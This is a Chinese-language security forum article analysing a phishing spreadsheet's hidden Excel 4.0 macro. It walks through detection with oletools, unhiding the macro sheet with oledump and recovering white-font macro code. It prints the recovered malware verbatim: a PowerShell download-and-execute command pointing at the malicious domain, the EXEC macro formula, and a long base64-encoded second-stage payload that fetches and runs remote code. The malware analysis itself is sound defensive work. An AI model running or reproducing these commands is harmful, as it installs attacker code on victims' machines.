分析钓鱼邮件搭载的Excel 4.0恶意宏

查看原文

其他

分析钓鱼邮件搭载的Excel 4.0恶意宏

jishuzhain 看雪学院 2021-03-07

本文为看雪论坛优秀文章

看雪论坛作者ID：jishuzhain

简介

工欲善其事必先利其器，首先既然遇到的是宏病毒文件，所以本地得装好office，本文使用的环境为office2016，之后打开Excel。

咋和平时看到的Excel表格不一样？如果不嫌麻烦ocr一下图片里显示的意思大概是说得启用宏后才能查看到图片内容，本质就是诱惑用户来启用宏，所以文档存在宏代码的话一启动就被提示需要启用宏，别启用就对了。

对于宏病毒，笔者目前接（是）触（工）不（具）多（党），不过之前使用过一个Python工具oletools。如果是Python2.7环境则安装命令为：pip install oletools。

装好后，利用oletools工具里的mraptor(macrorapter)查看是否可疑，如下显示可疑文件：

如果使用olevba提取恶意宏会解析失败，如下：

如果之前没有过多接触宏病毒，到这里肯定就一头雾水。其实原因是该样本没有存在VBA宏，而是被检测到了Excel 4.0宏（这个技术存在的时间比我年龄还大，真的），属性设置为隐藏。

关于Excel 4.0宏暂时不过多介绍了，因为参考链接里介绍的很详细了，有兴趣就直接看文末的链接，没有兴趣直接看笔者接下来的操作。

不过虽然不能手工提取恶意代码，但是取巧也可以通过沙箱获取执行的命令，如下：

第一阶段命令，如下：

powershell -command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://putin-malwrhunterteams.com/scan.txt')

第二阶段命令scan.txt内容如下，会使用IEX命令当做脚本内容执行。

PowERsHELl.`ExE -ExecutionPolicy bypass -w 1 /e RgB1AG4AYwB0AGkAbwBuACAAWgBoAFoAZwB7ACAAcABhAHIAYQBtACgAJAB4AEkAeABmAG0AVABGAEwASAB2AFEAUgBOACAALAAgACQARwBQAHQARQBsAHQASwBTAGwAUwBCAEkARAB3AEEAcgBPAHAAaAByAGgARgB5AGcAeAB4ACAALAAgACQAcQBmAGoAeQBkAHoAbwBSAHgAUgBnAFAAQQBEAGUAWABmAGQAZABQAEoASwBRAGgAYQBrAFYAdwBBAFIATQBIAG8AdgBUAG4AQwBUAFgASQBQAGYAKQANAAoAJABEAGkAUwBDAFQAaABvAGcAUABDAFgAdABlAHIAUQBnAEYAWgBiAEUAawByAFYATABHAFUAQQBlAEgAcQB6AEEARAAgAD0AIAAnAHQAUwB5AEoAbgBHAEgAbgBYAHoAdwBlAGUAWABPAFcAVQBJAHkAYwBDAEwATgBIAHcAeQBoAEsAWQAnADsADQAKACQAQwBXAHAAdgB5AHkAaQB2AGwAVQB4AHgAVQBWAE8AYgBxAGQAUABsAFcAcQAgAD0AIAAnAGIAZgBpACcAOwANAAoAJAByAE0AbwBaAHcAIAA9ACAAJwB5AHgAYQBwAGkAWgBQAG8AWQBXAGUAZgBGACcAOwANAAoAJAByAHMAVgBJAEUAdQBtAEMATABVAE8AUQBQAHUAcQBqAHcAdgBBAGkAVgBZAG8AbQBIAEQAQQB4AHkAVABYAHcAWgByAE0AeQAgAD0AIAAnAGcAVgBCAGIAdwBsAEcAYgBTAEoAVgB4AG8AYQBqAGUAVwBWAFQARABpAEIAQQB1AHAARAByAHcAUgBxAFgAaABzAHIAUQBaAHkAJwA7AA0ACgAkAFkAbQBpAEwAbwB1AGUAIAA9ACAAJwBKAHQAJwA7AA0ACgAkAFIAQwBXAHQAdgBKAGUAVgBIAG0AcwB0AEoASgBiAGwAbwBGAHgASgBKAGcAUQB3AGcAVgBXAE0ARwBRAHAAdQB5AEgAIAA9ACAAJwBvAEIAJwA7AA0ACgB9AA0ACgAkAHgAaQBtAEUAcgBVAGcAdABZAEMATgBJAHEAdQBNAGsAZgBsAG0AWgBNAFoAbQBSAE8AcgB3AHkAdgBDAEkAbgBqAEEAIAA9ACAAJwBPAFgARQBvAHYAUQBuAHgAJwA7AA0ACgBJAGYAIAAoACcAegB4AFoAdQBpAE8AYgBQAEIAYwBiAFgAdwBVAHAAegBZAGkAJwAgAC0AZQBxACAAJwBWAHQAYQBZAHEAbQB4AE0AYgB3AHIASgBaAGMAUgBTAFIAUgBCAFAAZwBhAHQAbABIAFkAawBTAEMATwBvAFgAaABvAGIAYgBZAFoAagBIAGsAQgAnACkAIAB7AA0ACgAkAFMASwAgAD0AIAAnAEMAdgBlAEMAWQBpAFcAUwBSAHYAegBvAFEAUgBDAGYASwAnADsADQAKACQASABUAGIAawBBAHEAdAByAGgAdQBmAGYAIAA9ACAAJwBiAGIAcABWAHAAbwBBAHAARwBCAFAAVwBmAGIAagBJAFIARgBGAHEAbgBMAHEAJwA7AA0ACgAkAFMAdQBkAaABBAGMAbgBsAFYAWQBOAGIAdwBOAHIASgBYAEEAUwBNAE4AVgBQAEoAaQBRAG8AYQBvAG0AUABrAHgARAB1ACAAPQAgACcAcwBJACcAOwANAAoAJABZAGMAbABLAEMAVwAgAD0AIAAnAFUAcwBOAGcAUQBLAFgAZQBFAFoAWQB5AHkAawB0AdwBpAEkAYwBkAHQAUwByAFIATwB2AHQAJwA7AA0ACgAkAGMASwBNAG4AQgB2AHcATQBJAFcARgBNAFQAeQBWAGIAdABLAFYAbABQAG8AYgB1AHQARABiAFoAVwBPAEIAIAA9ACAAJwBkAHUAYgBPAE0ASwB3AHAAcQBBAG8ATABEAFAAJwA7AA0ACgAkAHYAdwBQAFkARQBhAEkAVQBvAGkAIAA9ACAAJwB0AHgAVABYAHAAdABWAHEAaQBZAFcASABPAGkATgBmACcAOwANAAoAfQANAAoAJABQAHoAUQBxAGUAdABnAGMASABxAHgAbwBWAGEAbgBmAHUAUgB5AFYAVABLAHYAcQBNAGcAbABZAHAAQQBwAHEAdQBPAEUAcABTAGEAUAAgAD0AIAAnAG4AdQBpAEMAWAAnADsADQAKAEQATwB7AA0ACgAkAFoAYgB0AFMATABUAG0AcABOAGcAWQBiAGsAbgB6AGwAdAB3AFMAdwBnAEcAYgBCAFEASABHAGQAawAgAD0AIAAnAEEAUABVAGIAQgBkAEsARwBTAGQAVQBSAGEAYQAnADsADQAKACQAZwBKAFQAVgBNAFQAWABqAHgAQgBTAHoAcgBDAEQATQBKAEYAeQBnAEkARwBJAGwAVwAgAD0AIAAnAG4AZABvAGIATwBnAEIAWQBrAHgAbgBIAFgAdgBkAGcAWABaAGkAZABTAEQAUAAnADsADQAKACQATABNAGIAdABVAFoAQQBoAHoAbABnAHQAdQBWAG4AbQAgAD0AIAAnAFQAUwBHAFoAQgBoAEQAQwBjAGoAaQBEAHMASQBqAE8AWABRAEMARQBJAEUASwB3AEYASQBsAFAAagBsAEIAbQB2AGYAegBsAEkAcwBKAGUAWQByACcAOwANAAoAJABxAFMAZQBHAGQAeABlAFgARgBrAGkAcABQAEgASgBUAHMAdwBuAFMAcgBoAHcASABOAEoAeABGAGUARwBZAGcAUQBNAFQAZQBiACAAPQAgACcASQBTAEYAJwA7AA0ACgAkAHcAQgBOAHAAagBlAHoAWQBRAGkAawBZACAAPQAgACcASgBWACcAOwANAAoAJABzAFQAegBZAHQAeQBNAEIAWgBEAG4AZQByAHEAbgBWAE4AZABrAHUAIAA9ACAAJwBYAFoAVABHAEYAcQBxAHYAcwBMAEsASQBGAEoAbwBTAGcAVQB5AG8ATABRAGcAcQBWAGgAYQB1AE8ASwBXAFkAYgBjAFUAdQBnAFMAbgAnADsADQAKACQATgB5AGkAPQAgACQATgB5AGkAIAArACAAMQA7AH0AIABXAGgAaQBsAGUAIAAoACQATgB5AGkAIAAtAG4AZQAgADYAKQANAAoAVwBoAGkAbABlACAAKAAkAFcARwBnAHIAZABWAG0AZwAgAC0AbgBlACAANgApACAAewANAAoAJABEAGcASgBtAEYAaQBIAHQAYwBsAFkAUAB2AGcAaABvAGwAaABjAG8AdQBsAE4AaABxAFMARgBrAG8ATgB6AHUAdAB1AEwAZABOAG0AVgB1AE4AQgBEACAAPQAgACcATwBzAGEAWgB5AEMAcwBvAEoAcwBGAFIAVABjAHYAbgBjAFgARQBQAGwAZQBXAEIAVgBFAGIAeQBMACcAOwANAAoAJABXAEcAZwByAGQAVgBtAGcAPQAgACQAVwBHAGcAcgBkAFYAbQBnACAAKwAgADEAOwAkAGEAdABpAGYAVAB4AHIAZgBsAG0AVgBMAGsAQQBwAHQASwBrAHIAaQBSAHEAdwBvAHcAagBXAFoARAAgAD0AIAAnAGEAdABjAGIAUgBMAGoAbgBKAHgAdgB4AGwAUwB1AGEAdABWAEwAYwB0AHIASABkAFIAawB3AHQAagBqAGIAUwBiAHIATABiAGkASgBqACcAOwANAAoAJABXAEcAZwByAGQAVgBtAGcAPQAgACQAVwBHAGcAcgBkAFYAbQBnACAAKwAgADEAOwAkAEoAVwBiAHQAbQBUAEUAZQB0AFYAcQBBAE8AYgBBAGoAbQB6AEoAZwBQAHAARABaAFcAZAAgAD0AIAAnAHQASABTAHIAawBtAGgAUwBXAFAATgBxAHgAZgBSAHoATwB0AGIAJwA7AA0ACgAkAFcARwBnAHIAZABWAG0AZwA9ACAAJABXAEcAZwByAGQAVgBtAGcAIAArACAAMQA7ACQAegByAGIAcAAgAD0AIAAnAHoAQwBPAFUAVABCAFgASgB5AEwAWABiAGQARgBPAGgASgBkAFUAWQBJAE0AQQB5AHEAcABnAHYAWgBWACcAOwANAAoAJABXAEcAZwByAGQAVgBtAGcAPQAgACQAVwBHAGcAcgBkAFYAbQBnACAAKwAgADEAOwAkAGYAZABJACAAPQAgACcAagBUAHkARABOAHEAZwB5AFUAdQBZAGsAbgBNAFcAcQBOAEgAUQBhAG4AQgBRAGQAZQBVAGIAagBjAEkAcwAnADsADQAKACQAVwBHAGcAcgBkAFYAbQBnAD0AIAAkAFcARwBnAHIAZABWAG0AZwAgACsAIAAxADsAJABWAFYAZgBPAEwAYQBHAGgAYwBOAGYARQBSAEUAdABpAEQAZgBvAFkATgBoAHgAaABDAFUAWgB0AE8AeABXAE0AQwBiAFAAUgBoAEkAZQBEAIAA9ACAAJwB5AFoAVgBNAE0AYQBiAHQAZwB3AFQAVABrAG4AWQB4AEwAcgBBAE4AVABlAHIAVABDAHAAbwBjAEIAdgAnADsADQAKACQAVwBHAGcAcgBkAFYAbQBnAD0AIAAkAFcARwBnAHIAZABWAG0AZwAgACsAIAAxADsAfQANAAoARgB1AG4AYwB0AGkAbwBuACAAbwB2AHEAcgBtAFMAawB5AHgAUgBQAE8AbQB1AFEAeQBRAGMAcgBzAGsAbwBRAEcATABQAGEASABUAEwAdgBxAFIAQQBWAEYATwBCAGwAewAgAHAAYQByAGEAbQAoACQAQgBYAGUAIAAsACAAJABYAEwAcQBIAHoAUgBWAFEAWgBzAGkAcgBjAHQAagB4AG0AbQBuAFAAVABpAEMASwBXAGwAegByAGwAdgAgACwAIAAkAHYARgBFAEEAbQBVAGsAQgB2AHgATwBTAGIAVAB5AEwAaQAgACwAIAAkAHkATwBPAGsATwBQAG8ASgBnAGsATgBTAGQAZgBkAFoAIAAsACAAJABsAFkAcwB4AGMAQwBrAHIAUwBGAFEAYgBxAFkAWgBRAFoAbgBnAEUASwBxAG8ATABkAG8AegBvAGMAVABpAG8AQgAgACwAIAAkAE0AbgBxAFYAVgBNAGQAcwB3AEsAWQBoAHAATQBMARABzAHcAVgBjAHYAagBnAFQAbwBEAHcAIAAsACAAJAB5AFcAYwBaAEsATABsAGEARQBSAFUAYgBTAHUAIAAsACAAJABuAHYAeQBtAEEAWgBRAHEAcgBnAEUAUgBEAEoAQgBoAEoAaABkAHkAbgB3AEkAZgBCAEIAIAAsACAAJAB6AGEAYwB1AEsAQQBGAHMAWQBxAFEAdwBwAGkAZwBrAHMARgB0AGkAUQBEAGsATAApAA0ACgAkAGYAeABzAFIAUgBXAEcATABkAGoAQQBhAHQAVABKAEEAZgBrAGcAWABzACAAPQAgACcAZQBsAFYAWQB4AG0AWQBMAGoAUAByAFQATQBuAHYAegBvAHAASgBQAGUAagBMAFYAeAAnADsADQAKACQAcQBWAFoAZQBWAE8AZgBDAFMARwB2AHMAWQBUAG0AUgBBAGsAagBaAEgAVgBFAGcAdgByAE4AZAB5AHYAWgBBAGIAegB2AEQAbQBFAHUAZABvAEoAIAA9ACAAJwBwAEQAdwBRAHAAYwBOAGoAYQBtAFgAcQBWAFEAdABqAGQAQQAnADsADQAKACQARQBYAGcAIAA9ACAAJwBSAFkAWABpAGUAdgBxAEcAbAB4AEEAUABjAHoAYQBZAEEAbABMAHkATgBFAEoAYQBuAHQAVgBRAGMAbQBGAHgASQBIAGYAcwBSAHUAaQBuACcAOwANAAoAJABmAG0AcwBVAEIAUQBrAEQAYwBCAFQATABoAGgATQBQAHgAdgBsAGEAYQBkAHkAcwBEAEcAVQBUAGkARwBGACAAPQAgACcAWQBPAGkAUgAnADsADQAKACQARgBsAGMAbABNAEEAawBsAGwAYgBhAFMAYwBVACAAPQAgACcAdwBNAEoAQwBEAUgB2AHYAUQBVAFYAdgBRAG0AUwB6AHYAegBzAEoASgBwAE4AZABPAEcAUgBlAHUAQgBHAG0ARwBHAE0ARgBmAGUAUABvAHEAZwAnADsADQAKACQAcwBlAG8AVgB5AEkAYQBYAGMAYgBxAG4AVwB3AFoAWgB0AHoAIAA9ACAAJwBCAE8ATwBqAHAASwBhAE4AVABRAGoARQBTAGMAVgAnADsADQAKACQAeQBaAGwAVABXAFQAZQBkAEsAUQBTAHAASgBHAEYAVwBvAFoAZgAgAD0AIAAnAGQAdgB6AEsAWQB1ACcAOwANAAoAJABHAHQAWABYAEwAQgBhACAAPQAgACcAegBIAGcAdQBoAGsAbABaAFoAcgBsAEUATgBLAE4AUAB0AHcAUABzAEQAWgBiACcAOwANAAoAJABiAE4AWABrAG0AcwBIAG4AaQBmAEYAUABIAGYAeQBVAHIAVwBhAFMAbQBwAHMAdwBnAEgAZQBPAG0AaQBYAGEAZwBsAFMAVABOAEIAbQAgAD0AIAAnAGsAeABXAGkARQB4AEgATgB5AHUAQQBoAHoASQBJAG0AVQBiAEQAZgBPAHQAQgBBAEgAZgBpAFcAJwA7AA0ACgAkAGUASABxAGsAdQBpAG8AVABLAHIAaQBBACAAPQAgACcAUQByAGgAcQBhAFgAZABnAHoAbQB4AEcAUgByAHcAJwA7AA0ACgAkAGEAWgBQAGwAQQBUAG4ASgB4AEYAWgBUAFMASgBqAFYAZgB5AGMAIAA9ACAAJwBTAFIARgBLAHQAZwBlAFYAcwAnADsADQAKACQAYwByAHIAeABrAFMAVABPAFAAdwBFAFkAcwBWAHkASgBOAHEAQwBjAGIAUwBPAG4ARAAgAD0AIAAnAFUARQBzAFUAbwBTAFIAVQAnADsADQAKACQAaQBiAFYAWQBSAEMAUQBqAGYARQB1AFkAagBNAGoAUwBvAFMAUQBCAEoAYwBEAHQAYwAgAD0AIAAnAE8AVwB1AEkAbQBHAFkAcwBQAGgAcwBSAGsAWgBMAGoAagBqAEoAagBrAHIASgBDAEEAegBBAFQAUwBGAFgAYgB3AFQAbgB1AHAAWABTAG4AQQByACcAOwANAAoAJABCAFoAWABpAHEAcABhAHQAVQBrAHMATgBYAE0AcwBJAG4ARwBGAFoASgBKAFIAVQBRAG0AUQB1AEwAUgBWAGoAdAB1AEgAYwBjAFEASgBkAHMAIAA9ACAAJwBEAHIARABHAFEAaAB3AFAAZQBoAHUAJwA7AA0ACgB9AA0ACgAkAG4AcgBJAEMAUgBFAFkAZwBoAEQATwBKAFUAYwBGAFAAIAA9ACAAJwBXAHcAYwBoAHgARwBhAFEASwBWAGoAeAB3AG0AbwBvAGIASABQAFUAYQB6AEYARQBMAGUAegAnADsADQAKAEYAdQBuAGMAdABpAG8AbgAgAGoASABmAE8AVgBtAEEAdQBBAFIAbQBrAHEASQBBAHgATQBHAEgAawBVAFYAYgBBAHsAIABwAGEAcgBhAG0AKAAkAHUAbABuAGIAaABrAEkAawBTAGoAcABsAGgAbABHAGkAcABqAGwAUgBaAFUAcwBWAHAAIAAsACAAJABFAFgAcgBYAFYAVABIAHgAVwBZAGkASABRAE0AZQBEAFcAcgBSAGUAbQBvAHMAVwBPAGMAcwBoAEMAWgB0AFMAbQBsAGYAbAB0AHUATwBXACAALAAgACQAawBQAGkAQQBoAFMAWQBuAFcAeQBBAEQATABJAFAAZQBVAEkAdABhAFoAdQB3AGYAUAAgACwAIAAkAGUAaAB0AEoAYwBkAHYAQgBDAFoASwBXAGcASgBUAHUAZwBiAHMAIAAsACAAJABhAGQAUABHAFoAbABWAHYARABwAFMAQwBsACAALAAgACQAbwByAHUATQBXAFcASQBLAEcAcQBVAHkAKQANAAoAJABGAFcARwBRAFcAWgBtAGIASgBsAG8AWQBiAHgAUABrAFIAbgAgAD0AIAAnAEgAYwBmAE4ASQBNAHQAagBNAE4ASABPAGYAZQB0AFAAUQB1AGUAZQBzAEEASQAnADsADQAKACQAWABMAFkAbABKAHIAQQBDAGgAQgBzAHIAWgBJAHgARQBkAHAAWgBOAEMAWABJAHUAaABoAHoAcAAgAD0AIAAnAEoAaABIAFQAeQBxAHcAbgBJAGEAVQBNAEUAZwBkAGwAQwBwAEkAdwBaAEIAQwBhAHUAZgB6AEQAZQBFAGIAcwBLAE8AJwA7AA0ACgAkAFQAbABZAGIAUgBCAFEAVQBQAEYAQgB4AHEAZQBJAGYAcwBxAHMATgBJACAAPQAgACcAaABZAFQAcgB0AEkARQB5AGIAQwBxAEoASwBBAGQATwByAHYASgBnAG4AVQB0AGgASgBZACcAOwANAAoAJABZAGoAQgBSAEEAUABvAEUAegBJAFoASQBIAFEAUQBkAHoARwBoACAAPQAgACcASQBCAGUAegB4AEUAYwByAE0AZQBsAGkAVQBtAGYAUABhAGsAJwA7AA0ACgB9AA0ACgAkAHIAZQBnACAAPQAgACgAJwB7ADIAfQB7ADAAfQB7ADEAfQB7ADMAfQAnAC0AZgAnAGQAUwB0ACcALAAnAHIAaQBuACcALAAcIGAARABgAG8AYAB3AG4AYABsAGAAbwBhAB0gLAAnAGcAJwApADsAWwB2AG8AaQBkAF0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAFcAaQB0AGgAUABhAHIAdABpAGEAbABOAGEAbQBlACgAJwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAnACkAOwAkAGYAagA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AZQA0ADkAdQAwACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAEAAQAAiACwAIAAiADQANAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAgACIANwA4ACIAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBkAGwATwBNAHoAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAawAgAYQBjAGsAaQB0AHUAcABdADoAOgBlAHgAZQAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA= | &('I'+'EX')

如何取消隐藏属性？

该样本是无法通过右键来取消隐藏的，因为首先文档里不显示宏工作表，想右键取消会发现没有选项，但是这里可以使用oledump这个工具辅助一下，使用的命令如下：

oledump_V0_0_50>oledump.py -p plugin_biff.py --pluginoptions "-o BOUNDSHEET -a" C:\Users\onion\Desktop\Dokumentation.xls\Dokumentation.xls

得到位置序列：51 AA 02 00 01，0x00表示不隐藏，0x01表示隐藏，0x02表示深度隐藏。

直接手工修改十六进制，如下：

当保存后重新打开会出现宏工作表，不过宏代码目前是无法显示的，因为字体设置为白色了，也是为了对抗分析，增加迷惑性。

我们可以选中后更改字体颜色，让宏代码显示出来。

如何手工提取宏代码？

由于字体显示空白，可将其复制，之后再新建XLM 4.0宏表，粘贴至另外的宏工作表，然后全选中，接着修改文字颜色，就可以查看了。咦，出现了明显的PowerShell脚本痕迹。

最后整理一下，完整代码如下：

=RETURN()p://putin-malwrhunterteams.com/scan.txt');exit=EXEC("powershell -command " & "IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'t" & A9588)

拿到响应内容，如下：

PowERsHELl.`ExE -ExecutionPolicy bypass -w 1 /e RgB1AG4AYwB0AGkAbwBuACAAWgBoAFoAZwB7ACAAcABhAHIAYQBtACgAJAB4AEkAeABmAG0AVABGAEwASAB2AFEAUgBOACAALAAgACQARwBQAHQARQBsAHQASwBTAGwAUwBCAEkARAB3AEEAcgBPAHAAaAByAGgARgB5AGcAeAB4ACAALAAgACQAcQBmAGoAeQBkAHoAbwBSAHgAUgBnAFAAQQBEAGUAWABmAGQAZABQAEoASwBRAGgAYQBrAFYAdwBBAFIATQBIAG8AdgBUAG4AQwBUAFgASQBQAGYAKQANAAoAJABEAGkAUwBDAFQAaABvAGcAUABDAFgAdABlAHIAUQBnAEYAWgBiAEUAawByAFYATABHAFUAQQBlAEgAcQB6AEEARAAgAD0AIAAnAHQAUwB5AEoAbgBHAEgAbgBYAHoAdwBlAGUAWABPAFcAVQBJAHkAYwBDAEwATgBIAHcAeQBoAEsAWQAnADsADQAKACQAQwBXAHAAdgB5AHkAaQB2AGwAVQB4AHgAVQBWAE8AYgBxAGQAUABsAFcAcQAgAD0AIAAnAGIAZgBpACcAOwANAAoAJAByAE0AbwBaAHcAIAA9ACAAJwB5AHgAYQBwAGkAWgBQAG8AWQBXAGUAZgBGACcAOwANAAoAJAByAHMAVgBJAEUAdQBtAEMATABVAE8AUQBQAHUAcQBqAHcAdgBBAGkAVgBZAG8AbQBIAEQAQQB4AHkAVABYAHcAWgByAE0AeQAgAD0AIAAnAGcAVgBCAGIAdwBsAEcAYgBTAEoAVgB4AG8AYQBqAGUAVwBWAFQARABpAEIAQQB1AHAARAByAHcAUgBxAFgAaABzAHIAUQBaAHkAJwA7AA0ACgAkAFkAbQBpAEwAbwB1AGUAIAA9ACAAJwBKAHQAJwA7AA0ACgAkAFIAQwBXAHQAdgBKAGUAVgBIAG0AcwB0AEoASgBiAGwAbwBGAHgASgBKAGcAUQB3AGcAVgBXAE0ARwBRAHAAdQB5AEgAIAA9ACAAJwBvAEIAJwA7AA0ACgB9AA0ACgAkAHgAaQBtAEUAcgBVAGcAdABZAEMATgBJAHEAdQBNAGsAZgBsAG0AWgBNAFoAbQBSAE8AcgB3AHkAdgBDAEkAbgBqAEEAIAA9ACAAJwBPAFgARQBvAHYAUQBuAHgAJwA7AA0ACgBJAGYAIAAoACcAegB4AFoAdQBpAE8AYgBQAEIAYwBiAFgAdwBVAHAAegBZAGkAJwAgAC0AZQBxACAAJwBWAHQAYQBZAHEAbQB4AE0AYgB3AHIASgBaAGMAUgBTAFIAUgBCAFAAZwBhAHQAbABIAFkAawBTAEMATwBvAFgAaABvAGIAYgBZAFoAagBIAGsAQgAnACkAIAB7AA0ACgAkAFMASwAgAD0AIAAnAEMAdgBlAEMAWQBpAFcAUwBSAHYAegBvAFEAUgBDAGYASwAnADsADQAKACQASABUAGIAawBBAHEAdAByAGgAdQBmAGYAIAA9ACAAJwBiAGIAcABWAHAAbwBBAHAARwBCAFAAVwBmAGIAagBJAFIARgBGAHEAbgBMAHEAJwA7AA0ACgAkAFMAdQBkAaABBAGMAbgBsAFYAWQBOAGIAdwBOAHIASgBYAEEAUwBNAE4AVgBQAEoAaQBRAG8AYQBvAG0AUABrAHgARAB1ACAAPQAgACcAcwBJACcAOwANAAoAJABZAGMAbABLAEMAVwAgAD0AIAAnAFUAcwBOAGcAUQBLAFgAZQBFAFoAWQB5AHkAawB0AdwBpAEkAYwBkAHQAUwByAFIATwB2AHQAJwA7AA0ACgAkAGMASwBNAG4AQgB2AHcATQBJAFcARgBNAFQAeQBWAGIAdABLAFYAbABQAG8AYgB1AHQARABiAFoAVwBPAEIAIAA9ACAAJwBkAHUAYgBPAE0ASwB3AHAAcQBBAG8ATABEAFAAJwA7AA0ACgAkAHYAdwBQAFkARQBhAEkAVQBvAGkAIAA9ACAAJwB0AHgAVABYAHAAdABWAHEAaQBZAFcASABPAGkATgBmACcAOwANAAoAfQANAAoAJABQAHoAUQBxAGUAdABnAGMASABxAHgAbwBWAGEAbgBmAHUAUgB5AFYAVABLAHYAcQBNAGcAbABZAHAAQQBwAHEAdQBPAEUAcABTAGEAUAAgAD0AIAAnAG4AdQBpAEMAWAAnADsADQAKAEQATwB7AA0ACgAkAFoAYgB0AFMATABUAG0AcABOAGcAWQBiAGsAbgB6AGwAdAB3AFMAdwBnAEcAYgBCAFEASABHAGQAawAgAD0AIAAnAEEAUABVAGIAQgBkAEsARwBTAGQAVQBSAGEAYQAnADsADQAKACQAZwBKAFQAVgBNAFQAWABqAHgAQgBTAHoAcgBDAEQATQBKAEYAeQBnAEkARwBJAGwAVwAgAD0AIAAnAG4AZABvAGIATwBnAEIAWQBrAHgAbgBIAFgAdgBkAGcAWABaAGkAZABTAEQAUAAnADsADQAKACQATABNAGIAdABVAFoAQQBoAHoAbABnAHQAdQBWAG4AbQAgAD0AIAAnAFQAUwBHAFoAQgBoAEQAQwBjAGoAaQBEAHMASQBqAE8AWABRAEMARQBJAEUASwB3AEYASQBsAFAAagBsAEIAbQB2AGYAegBsAEkAcwBKAGUAWQByACcAOwANAAoAJABxAFMAZQBHAGQAeABlAFgARgBrAGkAcABQAEgASgBUAHMAdwBuAFMAcgBoAHcASABOAEoAeABGAGUARwBZAGcAUQBNAFQAZQBiACAAPQAgACcASQBTAEYAJwA7AA0ACgAkAHcAQgBOAHAAagBlAHoAWQBRAGkAawBZACAAPQAgACcASgBWACcAOwANAAoAJABzAFQAegBZAHQAeQBNAEIAWgBEAG4AZQByAHEAbgBWAE4AZABrAHUAIAA9ACAAJwBYAFoAVABHAEYAcQBxAHYAcwBMAEsASQBGAEoAbwBTAGcAVQB5AG8ATABRAGcAcQBWAGgAYQB1AE8ASwBXAFkAYgBjAFUAdQBnAFMAbgAnADsADQAKACQATgB5AGkAPQAgACQATgB5AGkAIAArACAAMQA7AH0AIABXAGgAaQBsAGUAIAAoACQATgB5AGkAIAAtAG4AZQAgADYAKQANAAoAVwBoAGkAbABlACAAKAAkAFcARwBnAHIAZABWAG0AZwAgAC0AbgBlACAANgApACAAewANAAoAJABEAGcASgBtAEYAaQBIAHQAYwBsAFkAUAB2AGcAaABvAGwAaABjAG8AdQBsAE4AaABxAFMARgBrAG8ATgB6AHUAdAB1AEwAZABOAG0AVgB1AE4AQgBEACAAPQAgACcATwBzAGEAWgB5AEMAcwBvAEoAcwBGAFIAVABjAHYAbgBjAFgARQBQAGwAZQBXAEIAVgBFAGIAeQBMACcAOwANAAoAJABXAEcAZwByAGQAVgBtAGcAPQAgACQAVwBHAGcAcgBkAFYAbQBnACAAKwAgADEAOwAkAGEAdABpAGYAVAB4AHIAZgBsAG0AVgBMAGsAQQBwAHQASwBrAHIAaQBSAHEAdwBvAHcAagBXAFoARAAgAD0AIAAnAGEAdABjAGIAUgBMAGoAbgBKAHgAdgB4AGwAUwB1AGEAdABWAEwAYwB0AHIASABkAFIAawB3AHQAagBqAGIAUwBiAHIATABiAGkASgBqACcAOwANAAoAJABXAEcAZwByAGQAVgBtAGcAPQAgACQAVwBHAGcAcgBkAFYAbQBnACAAKwAgADEAOwAkAEoAVwBiAHQAbQBUAEUAZQB0AFYAcQBBAE8AYgBBAGoAbQB6AEoAZwBQAHAARABaAFcAZAAgAD0AIAAnAHQASABTAHIAawBtAGgAUwBXAFAATgBxAHgAZgBSAHoATwB0AGIAJwA7AA0ACgAkAFcARwBnAHIAZABWAG0AZwA9ACAAJABXAEcAZwByAGQAVgBtAGcAIAArACAAMQA7ACQAegByAGIAcAAgAD0AIAAnAHoAQwBPAFUAVABCAFgASgB5AEwAWABiAGQARgBPAGgASgBkAFUAWQBJAE0AQQB5AHEAcABnAHYAWgBWACcAOwANAAoAJABXAEcAZwByAGQAVgBtAGcAPQAgACQAVwBHAGcAcgBkAFYAbQBnACAAKwAgADEAOwAkAGYAZABJACAAPQAgACcAagBUAHkARABOAHEAZwB5AFUAdQBZAGsAbgBNAFcAcQBOAEgAUQBhAG4AQgBRAGQAZ